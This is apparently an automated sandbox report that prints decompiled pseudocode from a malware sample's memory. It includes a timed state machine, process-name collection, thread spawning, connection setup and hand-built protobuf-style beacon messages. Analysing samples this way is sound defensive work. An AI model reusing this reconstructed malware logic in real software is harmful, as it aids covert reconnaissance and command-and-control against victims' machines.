Part of subcall function 00A823F0: GetProcessHeap.KERNEL32(00000000,00A88583), ref: 00A8250A
Part of subcall function 00A823F0: HeapFree.KERNEL32(00000000), ref: 00A82511

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
String ID:
API String ID: 876682111-0
Opcode ID: d0d0e2f62ada70158baf03db4c8ff6506ee12072a077a2a17fda1e6c44de8bb2
Instruction ID: 8fa87514d1175ad75fbb978079eb606cc0b4059cb2f9b3943fe6d32c4f0f4922
Opcode Fuzzy Hash: d0d0e2f62ada70158baf03db4c8ff6506ee12072a077a2a17fda1e6c44de8bb2
Instruction Fuzzy Hash: 72512C72900205AFEB00FBE0ED49BEE7B79EF08315F444560F605D61A2EB359A56CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A88DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00A88DD0(void* __edx) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
				if(_t28 <  *0xa8c278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0xa8c280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M00A89044))) {
							case 0:
								 *0xa8c280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0xa8c280 = 0;
								__eax = E00A89620(__ecx, __edx);
								__eax = __eax;
								if(__eax == 0) {
									 *0xa8c280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0xa8c29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0xa8c280 = 0;
								 *0xa8c294 = 0xa81270;
								 *0xa8c298 = 0xa81270;
								__eax = E00A822E0();
								__eax =  *0xa8c02c; // 0xa812f8
								 *0xa8c26c = __eax;
								__eax =  *0xa8c030; // 0x6a
								 *0xa8c268 = 0xa8c2a8;
								 *0xa8c270 = __eax;
								 *0xa8c280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0xa8c280 = 0;
								__eax = E00A88BB0( &_v28);
								__ecx =  &_v36;
								__eax = E00A88D50( &_v36);
								__eax =  *0xa8cbd0; // 0x0
								_push(0xa8c2a8);
								_v32 = __eax;
								_v44 = 0xa8c2a8;
								_v44 =  *0xa8c1e4();
								__eax =  *0xa8c2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = E00A88920( &_v24);
									__ecx =  &_v16;
									__eax = E00A8A7A0( &_v16);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(E00A89F80( &_v84,  &_v52) != 0) {
										 &_v92 =  &_v84;
										if(E00A88520( &_v84,  &_v92) == 0) {
											__eax =  *0xa8c298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0xa8c298 = __eax;
											 *0xa8c298 = __eax;
										} else {
											__eax = E00A899A0();
											__ecx = 0;
											__eax = E00A888B0(0);
											__ecx = 0;
											__eax = E00A8A750(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(E00A8A180( &_v92,  &_v76) != 0) {
												__eax = E00A81750();
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = E00A89A90(_v76, __edx);
												}
												__eax = E00A81750();
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = E00A88990(_v68, __edx);
													__esi = 0;
												}
												__eax = E00A81750();
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = E00A8A810(_v60, __edx);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0xa8c280 = 4;
								 *0xa8c278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x00a88dda
0x00a88de6
0x00a8903d
0x00a89041
0x00a88dec
0x00a88dec
0x00a88df1
0x00a88df5
0x00000000
0x00a88dfb
0x00a88dfb
0x00000000
0x00a88e02
0x00a88e10
0x00000000
0x00000000
0x00a88e13
0x00a88e1d
0x00a88e22
0x00a88e25
0x00a88e41
0x00a88e4b
0x00a88e4f
0x00a88e27
0x00a88e28
0x00000000
0x00a88e2e
0x00a88e34
0x00a88e3a
0x00a88e3e
0x00a88e3e
0x00a88e28
0x00000000
0x00000000
0x00a88e52
0x00a88e5c
0x00a88e66
0x00a88e70
0x00a88e75
0x00a88e7a
0x00a88e7f
0x00a88e84
0x00a88e8e
0x00a88e93
0x00a88e9d
0x00a88ea1
0x00000000
0x00000000
0x00a88ea4
0x00a88ea8
0x00a88eb2
0x00a88eb7
0x00a88ebb
0x00a88ec0
0x00a88ec5
0x00a88eca
0x00a88ece
0x00a88edc
0x00a88ee0
0x00a88ee8
0x00a88ef0
0x00a88ef0
0x00a88ef4
0x00a88ef9
0x00a88efe
0x00a88f02
0x00a88f07
0x00a88f0b
0x00a88f16
0x00a88f21
0x00a88f30
0x00a88fb1
0x00a88fb6
0x00a88fbb
0x00a88fbe
0x00a88fcd
0x00a88f32
0x00a88f32
0x00a88f37
0x00a88f39
0x00a88f3e
0x00a88f40
0x00a88f45
0x00a88f49
0x00a88f54
0x00a88f56
0x00a88f5b
0x00a88f61
0x00a88f63
0x00a88f67
0x00a88f67
0x00a88f6c
0x00a88f71
0x00a88f77
0x00a88f79
0x00a88f7d
0x00a88f82
0x00a88f82
0x00a88f84
0x00a88f89
0x00a88f8f
0x00a88f91
0x00a88f95
0x00a88f9a
0x00a88f9a
0x00a88f8f
0x00a88fa9
0x00a88fa9
0x00a88fdf
0x00a88fdf
0x00a88ff2
0x00a89005
0x00a8900b
0x00a89013
0x00a8901d
0x00a8901f
0x00a8902b
0x00a89037
0x00000000
0x00000000
0x00a88dfb
0x00a88df5
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00A88DDA
SetEvent.KERNEL32 ref: 00A88E34
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A8C2A8), ref: 00A88ED6
GetProcessHeap.KERNEL32(00000000,?), ref: 00A88FA2
HeapFree.KERNEL32(00000000), ref: 00A88FA9
GetProcessHeap.KERNEL32(00000000,?), ref: 00A88FD8
HeapFree.KERNEL32(00000000), ref: 00A88FDF
GetProcessHeap.KERNEL32(00000000,?), ref: 00A88FEB
HeapFree.KERNEL32(00000000), ref: 00A88FF2
GetProcessHeap.KERNEL32(00000000,?), ref: 00A88FFE
HeapFree.KERNEL32(00000000), ref: 00A89005
GetTickCount.KERNEL32 ref: 00A89013
GetProcessHeap.KERNEL32(00000000,?), ref: 00A89030
HeapFree.KERNEL32(00000000), ref: 00A89037

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$CountTick$Eventlstrlen
String ID:
API String ID: 1747682351-0
Opcode ID: d53074cee1ba8a0339da8560655a4911e862df7c62d7606a2b877ca0a966a9c6
Instruction ID: d9e88ad21f0c6eacf37e05c361bbb894d7cd19ba73bae3927af9044842927df0
Opcode Fuzzy Hash: d53074cee1ba8a0339da8560655a4911e862df7c62d7606a2b877ca0a966a9c6
Instruction Fuzzy Hash: 5D518B725042009FD700FFE4ED8AA9A7BB5FB84724F440A19F545C66A1EF398916CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A88BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A88BB0(char** __ecx) {
				short* _v8;
				long _v12;
				char** _v16;
				int* _v20;
				short _v540;
				char** _t39;
				short* _t49;
				int* _t61;
				int _t71;
				int _t73;
				signed int _t74;
				short* _t75;
				intOrPtr* _t80;
				long _t82;
				int _t83;
				char** _t84;
				WCHAR* _t86;
				char* _t87;

				_v12 = 0;
				_t73 = 0;
				_v16 = __ecx;
				 *__ecx = 0;
				_t39 =  &(__ecx[1]);
				_v20 = _t39;
				_v8 = 0;
				 *_t39 = 0;
				GetModuleFileNameW(0,  &_v540, 0x104);
				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
				if(_t86 >  &_v540) {
					while( *_t86 != 0x5c) {
						_t86 = _t86 - 2;
						if(_t86 >  &_v540) {
							continue;
						} else {
						}
						goto L6;
					}
					_t86 =  &(_t86[1]);
				}
				L6:
				E00A82110( &_v12);
				_t80 = _v12;
				if(_t80 != 0) {
					_t75 = 0;
					do {
						_t14 = _t80 + 4; // 0x4
						_t71 = lstrlenW(_t14);
						_t80 =  *_t80;
						_t75 = _t75 + 1 + _t71;
					} while (_t80 != 0);
					_v8 = _t75;
					_t73 = 0;
				}
				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8);
				_v8 = _t49;
				if(_t49 == 0) {
					return 0 |  *_v16 != 0x00000000;
				} else {
					_t82 = _v12;
					while(_t82 != 0) {
						_t19 = _t82 + 4; // 0x4
						if(lstrcmpiW(_t19, _t86) == 0) {
							_t49 = _v8;
						} else {
							_t20 = _t82 + 4; // 0x4
							lstrcpyW( &(_v8[_t73]), _t20);
							_t24 = _t82 + 4; // 0x4
							_t74 = _t73 + lstrlenW(_t24);
							_t49 = _v8;
							_t49[_t74] = 0x2c;
							_t73 = _t74 + 1;
						}
						_t82 =  *_t82;
					}
					_t87 = 0;
					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0);
					if(_t83 != 0) {
						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
						if(_t87 != 0) {
							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
							_t61 = _v20;
							if(_t61 != 0) {
								 *_t61 = _t83;
							}
						}
					}
					_t84 = _v16;
					 *_t84 = _t87;
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0 |  *_t84 != 0x00000000;
				}
			}

0x00a88bbc
0x00a88bc3
0x00a88bc5
0x00a88bca
0x00a88bcc
0x00a88bcf
0x00a88bd7
0x00a88bde
0x00a88be8
0x00a88c01
0x00a88c0c
0x00a88c10
0x00a88c16
0x00a88c21
0x00000000
0x00000000
0x00a88c23
0x00000000
0x00a88c21
0x00a88c25
0x00a88c25
0x00a88c28
0x00a88c2b
0x00a88c30
0x00a88c35
0x00a88c37
0x00a88c40
0x00a88c40
0x00a88c44
0x00a88c4a
0x00a88c4d
0x00a88c4f
0x00a88c53
0x00a88c56
0x00a88c56
0x00a88c67
0x00a88c6d
0x00a88c72
0x00a88d4a
0x00a88c78
0x00a88c78
0x00a88c7d
0x00a88c80
0x00a88c8d
0x00a88cbb
0x00a88c8f
0x00a88c8f
0x00a88c9a
0x00a88ca0
0x00a88caa
0x00a88cb1
0x00a88cb4
0x00a88cb8
0x00a88cb8
0x00a88cbe
0x00a88cc0
0x00a88cc4
0x00a88cd8
0x00a88cdc
0x00a88cee
0x00a88cf2
0x00a88d06
0x00a88d0c
0x00a88d11
0x00a88d13
0x00a88d13
0x00a88d11
0x00a88cf2
0x00a88d15
0x00a88d1d
0x00a88d26
0x00a88d39
0x00a88d39

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00A88BE8
lstrlenW.KERNEL32(?), ref: 00A88BF5
lstrlenW.KERNEL32(00000004), ref: 00A88C44
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A88C60
RtlAllocateHeap.NTDLL(00000000), ref: 00A88C67
lstrcmpiW.KERNEL32(00000004,?), ref: 00A88C85
lstrcpyW.KERNEL32(00000000,00000004), ref: 00A88C9A
lstrlenW.KERNEL32(00000004), ref: 00A88CA4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A88CD2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A88CE1
RtlAllocateHeap.NTDLL(00000000), ref: 00A88CE8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A88D06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A88D1F
HeapFree.KERNEL32(00000000), ref: 00A88D26

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
String ID:
API String ID: 2501218360-0
Opcode ID: c98d55b6340dd005085ce269ff16a86d95f32860aab57d80837b2679be1b4774
Instruction ID: 92e31457e336b5f65dba4898fd3526f5de21c78355e9142f8b91aca319ea8fd3
Opcode Fuzzy Hash: c98d55b6340dd005085ce269ff16a86d95f32860aab57d80837b2679be1b4774
Instruction Fuzzy Hash: 57517EB6940219AFDB20EFE5DC8CA9ABBB8FF44720F550565E904D7250EF349E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A8A690(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, E00A8A3A0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0xa8cbd4; // 0x0
					 *_t32 = _t25;
					 *0xa8cbd4 = _t32;
					return _t25;
				}
			}

0x00a8a692
0x00a8a6a4
0x00a8a6aa
0x00a8a6ae
0x00a8a743
0x00a8a6b4
0x00a8a6b6
0x00a8a6bb
0x00a8a6be
0x00a8a6be
0x00a8a6c1
0x00a8a6c7
0x00a8a6d1
0x00a8a6eb
0x00a8a6ef
0x00a8a731
0x00000000
0x00a8a73b
0x00a8a701
0x00a8a704
0x00a8a70a
0x00a8a70f
0x00a8a72b
0x00000000
0x00a8a72b
0x00a8a711
0x00a8a716
0x00a8a718
0x00a8a720
0x00a8a720

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,00A8A87A,?,000DBBA0,?,?,?,?,?,?,?,00A88F9A), ref: 00A8A69D
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00A8A6A4
memcpy.NTDLL(00000010,?,?,?,00000000,00A8A87A,?,000DBBA0,?,?,?,?,?,?,?,00A88F9A), ref: 00A8A6D1
GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,00A88F9A), ref: 00A8A6DE
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00A8A6E5
CreateThread.KERNEL32(00000000,00000000,00A8A3A0,00000000,00000000,00000000), ref: 00A8A704
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00A88F9A), ref: 00A8A724
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00A88F9A), ref: 00A8A72B
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00A88F9A), ref: 00A8A734
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00A88F9A), ref: 00A8A73B

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
String ID:
API String ID: 1978610079-0
Opcode ID: dd64a3fff58725a7285bb4b60df5b3fe5fa30c2caeedade9aee8635e3143f81b
Instruction ID: 27ab9ad224d37c82803ca75612a046da275868e6e57e18b2968d3363089ded2e
Opcode Fuzzy Hash: dd64a3fff58725a7285bb4b60df5b3fe5fa30c2caeedade9aee8635e3143f81b
Instruction Fuzzy Hash: 78212C75640601BFE7209FA9EC4DF46BBA4FB44721F108619FA59C7691CB30E451CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A81C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00A81C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v524;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t31;
				int _t32;
				void* _t35;
				intOrPtr* _t36;

				_t35 = 0;
				_v12 = 0x200;
				_t36 = __ecx;
				_t31 = __edx;
				_v8 = __edx;
				memset(__ecx, 0, 0x14);
				_push( &_v12);
				_push( &_v524);
				_push(0);
				if( *0xa8c0cc() >= 0) {
					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
					if(_t32 != 0) {
						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
						if(_t35 != 0) {
							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
						}
					}
					_t31 = _v8;
				}
				 *_t36 =  *0xa8c244(_t35, 0, 0, 0, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				_t19 =  *_t36;
				if(_t19 == 0) {
					L9:
					return 0;
				} else {
					_t21 =  *0xa8c254(_t19, _t31, _a4, 0, 0, 3, 0, 0);
					 *((intOrPtr*)(_t36 + 4)) = _t21;
					if(_t21 == 0) {
						 *0xa8c234( *_t36);
						goto L9;
					} else {
						 *((intOrPtr*)(_t36 + 0xc)) = 3;
						return 1;
					}
				}
			}

0x00a81c5e
0x00a81c60
0x00a81c67
0x00a81c69
0x00a81c6d
0x00a81c70
0x00a81c7c
0x00a81c83
0x00a81c84
0x00a81c8d
0x00a81ca2
0x00a81ca6
0x00a81cbb
0x00a81cbf
0x00a81cd0
0x00a81cd0
0x00a81cbf
0x00a81cd6
0x00a81cd6
0x00a81ceb
0x00a81cf4
0x00a81cfa
0x00a81cfe
0x00a81d39
0x00a81d3f
0x00a81d00
0x00a81d0f
0x00a81d15
0x00a81d1a
0x00a81d31
0x00000000
0x00a81d1d
0x00a81d1d
0x00a81d2e
0x00a81d2e
0x00a81d1a

APIs

memset.NTDLL ref: 00A81C70
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A81C9C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A81CAE
RtlAllocateHeap.NTDLL(00000000), ref: 00A81CB5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A81CD0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A81CED
HeapFree.KERNEL32(00000000), ref: 00A81CF4

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
String ID:
API String ID: 4040929015-0
Opcode ID: db7825cd69085abbe042a23b9ccd119f34c961372f41b8b77ea093e77ca4721c
Instruction ID: 430d073a3849c59e2fbac68f0c63504d219fd5883cca8b3abd89ca5419b041ef
Opcode Fuzzy Hash: db7825cd69085abbe042a23b9ccd119f34c961372f41b8b77ea093e77ca4721c
Instruction Fuzzy Hash: 4B317E71640304BBF7209FE5AC8DFAB7BBCEB85B21F100269BA14D61D1DB7099428B70

Uniqueness

Uniqueness Score: -1.00%

Function 00A89F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A89F80(intOrPtr* __ecx, unsigned int* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				long _t50;
				signed char _t61;
				signed char _t63;
				signed char _t65;
				signed char _t67;
				signed char _t69;
				intOrPtr _t71;
				intOrPtr* _t72;
				int _t73;
				int _t74;
				int _t75;
				intOrPtr _t77;
				signed char _t78;
				signed char _t80;
				signed char _t82;
				signed char _t84;
				signed char _t86;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				int _t93;
				signed char* _t94;
				void* _t95;
				intOrPtr _t96;
				char* _t99;
				signed char* _t100;
				signed char* _t101;
				void* _t102;
				char* _t103;
				signed char* _t104;
				void* _t105;
				char* _t106;
				signed char* _t107;
				void* _t108;
				char* _t109;
				signed char* _t110;

				_t94 = __edx;
				_v16 = __ecx;
				_t96 = 1;
				_v12 = 1;
				_t37 =  *__edx;
				if(_t37 > 0x7f) {
					do {
						_t37 = _t37 >> 7;
						_t96 = _t96 + 1;
					} while (_t37 > 0x7f);
					_v12 = _t96;
				}
				_t4 =  &(_t94[8]); // 0x0
				_t38 =  *_t4;
				_t77 = 1;
				while(_t38 > 0x7f) {
					_t38 = _t38 >> 7;
					_t77 = _t77 + 1;
				}
				_t5 =  &(_t94[0x18]); // 0x0
				_t39 =  *_t5;
				_t89 = 1;
				while(_t39 > 0x7f) {
					_t39 = _t39 >> 7;
					_t89 = _t89 + 1;
				}
				_t6 =  &(_t94[0x20]); // 0x0
				_t40 =  *_t6;
				_t71 = 1;
				while(_t40 > 0x7f) {
					_t40 = _t40 >> 7;
					_t71 = _t71 + 1;
				}
				_t7 =  &(_t94[0x28]); // 0x0
				_t41 =  *_t7;
				_v8 = 1;
				while(_t41 > 0x7f) {
					_v8 = _v8 + 1;
					_t41 = _t41 >> 7;
				}
				_t11 =  &(_t94[0x28]); // 0x0
				_t12 =  &(_t94[0x20]); // 0x0
				_t13 =  &(_t94[0x18]); // 0x0
				_t14 =  &(_t94[8]); // 0x0
				_t72 = _v16;
				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf;
				 *(_t72 + 4) = _t50;
				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50);
				 *_t72 = _t99;
				if(_t99 != 0) {
					 *_t99 = 8;
					_t100 = _t99 + 1;
					_t78 =  *_t94;
					while(_t78 > 0x7f) {
						_t69 = _t78;
						_t78 = _t78 >> 7;
						 *_t100 = _t69 | 0x00000080;
						_t100 =  &(_t100[1]);
					}
					 *_t100 = _t78 & 0x0000007f;
					_t100[1] = 0x12;
					_t101 =  &(_t100[2]);
					_t20 =  &(_t94[8]); // 0x0
					_t73 =  *_t20;
					_t80 = _t73;
					_t21 =  &(_t94[4]); // 0x0
					_t90 =  *_t21;
					if(_t73 > 0x7f) {
						do {
							_t67 = _t80;
							_t80 = _t80 >> 7;
							 *_t101 = _t67 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t80 > 0x7f);
					}
					 *_t101 = _t80 & 0x0000007f;
					_t102 =  &(_t101[1]);
					memcpy(_t102, _t90, _t73);
					_t103 = _t102 + _t73;
					 *_t103 = 0x1d;
					_t22 =  &(_t94[0xc]); // 0x0
					 *(_t103 + 1) =  *_t22;
					 *((char*)(_t103 + 5)) = 0x25;
					_t25 =  &(_t94[0x10]); // 0x0
					 *(_t103 + 6) =  *_t25;
					 *((char*)(_t103 + 0xa)) = 0x2a;
					_t104 = _t103 + 0xb;
					_t28 =  &(_t94[0x18]); // 0x0
					_t74 =  *_t28;
					_t82 = _t74;
					_t29 =  &(_t94[0x14]); // 0x0
					_t91 =  *_t29;
					if(_t74 > 0x7f) {
						do {
							_t65 = _t82;
							_t82 = _t82 >> 7;
							 *_t104 = _t65 | 0x00000080;
							_t104 =  &(_t104[1]);
						} while (_t82 > 0x7f);
					}
					 *_t104 = _t82 & 0x0000007f;
					_t105 =  &(_t104[1]);
					memcpy(_t105, _t91, _t74);
					_t106 = _t105 + _t74;
					 *_t106 = 0x32;
					_t107 = _t106 + 1;
					_t30 =  &(_t94[0x20]); // 0x0
					_t75 =  *_t30;
					_t84 = _t75;
					_t31 =  &(_t94[0x1c]); // 0x0
					_t92 =  *_t31;
					if(_t75 > 0x7f) {
						do {
							_t63 = _t84;
							_t84 = _t84 >> 7;
							 *_t107 = _t63 | 0x00000080;
							_t107 =  &(_t107[1]);
						} while (_t84 > 0x7f);
					}
					 *_t107 = _t84 & 0x0000007f;
					_t108 =  &(_t107[1]);
					memcpy(_t108, _t92, _t75);
					_t109 = _t108 + _t75;
					 *_t109 = 0x3a;
					_t110 = _t109 + 1;
					_t32 =  &(_t94[0x28]); // 0x0
					_t93 =  *_t32;
					_t86 = _t93;
					_t33 =  &(_t94[0x24]); // 0x0
					_t95 =  *_t33;
					if(_t93 > 0x7f) {
						do {
							_t61 = _t86;
							_t86 = _t86 >> 7;
							 *_t110 = _t61 | 0x00000080;
							_t110 =  &(_t110[1]);
						} while (_t86 > 0x7f);
					}
					 *_t110 = _t86 & 0x0000007f;
					memcpy( &(_t110[1]), _t95, _t93);
					_t72 = _v16;
				}
				return 0 |  *_t72 != 0x00000000;
			}

0x00a89f89
0x00a89f8b
0x00a89f8e
0x00a89f93
0x00a89f96
0x00a89f9b
0x00a89fa0
0x00a89fa0
0x00a89fa3
0x00a89fa4
0x00a89fa9
0x00a89fa9
0x00a89fac
0x00a89fac
0x00a89faf
0x00a89fb7
0x00a89fc0
0x00a89fc3
0x00a89fc4
0x00a89fc9
0x00a89fc9
0x00a89fcc
0x00a89fd4
0x00a89fd6
0x00a89fd9
0x00a89fda
0x00a89fdf
0x00a89fdf
0x00a89fe2
0x00a89fea
0x00a89ff0
0x00a89ff3
0x00a89ff4
0x00a89ff9
0x00a89ff9
0x00a89ffc
0x00a8a006
0x00a8a010
0x00a8a013
0x00a8a016
0x00a8a01b
0x00a8a01e
0x00a8a021
0x00a8a024
0x00a8a02f
0x00a8a039
0x00a8a03e
0x00a8a04e
0x00a8a050
0x00a8a054
0x00a8a05a
0x00a8a05d
0x00a8a05e
0x00a8a063
0x00a8a065
0x00a8a067
0x00a8a06c
0x00a8a06e
0x00a8a06f
0x00a8a077
0x00a8a079
0x00a8a07d
0x00a8a080
0x00a8a080
0x00a8a083
0x00a8a085
0x00a8a085
0x00a8a08b
0x00a8a090
0x00a8a090
0x00a8a092
